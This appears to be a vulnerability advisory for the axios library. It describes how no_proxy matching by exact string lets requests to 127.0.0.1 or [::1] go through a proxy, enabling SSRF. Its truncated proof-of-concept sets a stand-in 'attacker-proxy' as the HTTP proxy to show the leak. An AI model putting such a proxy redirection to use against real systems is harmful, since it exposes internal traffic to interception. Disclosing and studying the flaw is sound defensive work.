Use of insecure channel - Source code in node-axios

Description

Axios: no_proxy bypass via IP alias allows SSRF. The fix for the no_proxy hostname normalization bypass (#10661) is incomplete. When no_proxy=localhost is set, requests to 127.0.0.1 and [::1] still route through the proxy instead of bypassing it.

The shouldBypassProxy() function does pure string matching: it does not resolve IP aliases or loopback equivalents, so a no_proxy entry only exempts the exact spelling it contains. As a result:

    no_proxy=localhost does NOT exempt requests to 127.0.0.1 or [::1] from the proxy

    no_proxy=127.0.0.1 does NOT exempt requests to localhost or [::1] from the proxy

POC (the reporter's script; the trailing "..." marks where the page truncates it):

    const axios = require('axios');

    // no_proxy=localhost is meant to keep loopback traffic off the proxy
    process.env.no_proxy = 'localhost';
    process.env.http_proxy = 'http://attacker-proxy:8888';
    // The PoC then repoints the proxy at a local listener so the leaked request can be observed
    process.env.http_proxy = 'http://127.0.0.1:8888';

    (async () => {
      console.log('=== Test 1: localhost (should bypass proxy) ===');
      try {
        await axios.get('http://localhost:7777/');
      } catch (e) {
        console.log('Error:', e.message);
      }
      // ...
    })();

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions